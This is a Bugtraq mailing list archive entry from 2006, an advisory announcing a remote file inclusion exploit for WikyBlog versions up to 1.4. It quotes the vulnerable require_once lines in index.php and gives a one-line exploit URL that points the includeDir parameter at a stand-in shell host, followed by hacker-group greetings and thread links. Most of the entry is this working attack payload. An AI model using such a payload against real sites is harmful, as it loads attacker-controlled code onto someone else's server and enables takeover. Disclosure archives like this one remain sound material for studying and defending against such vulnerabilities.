Bugtraq mailing list archives
WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit
From: xp1o () msn com
Date: 4 Oct 2006 23:28:44 -0000
#============================================================================================== #WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit #=============================================================================================== #Bug in :index.php # #Vlu Code : #-------------------------------- # # require_once($includeDir.'/wiki2.php'); # require_once($includeDir.'/wiki3.php'); # # #================================================================================================ # #Exploit : #-------------------------------- # #htpp://sitename.com/[scerpitPath]/index.php?includeDir=http://SHELLURL.COM # #================================================================================================ #Discoverd By : MoHaNdKo # #Conatact : xp1o () msn com #or # wWw.xP10.CoM & wWw.TaRyaG.CoM #Greetz : r00tshell ( abo nora ) & 3abdalah & KaBaRa & mahmood_ali & ThE-WoLf-KsA # and all member on xp10.com and tryag.com ================================================================================================== vendor: http://puzzle.dl.sourceforge.net/sourceforge/wikyblog/WikyBlog-1.2.3.zip
Current thread:
- WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit xp1o (Oct 05)
- <Possible follow-ups>
- Re: WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit Steven M. Christey (Oct 06)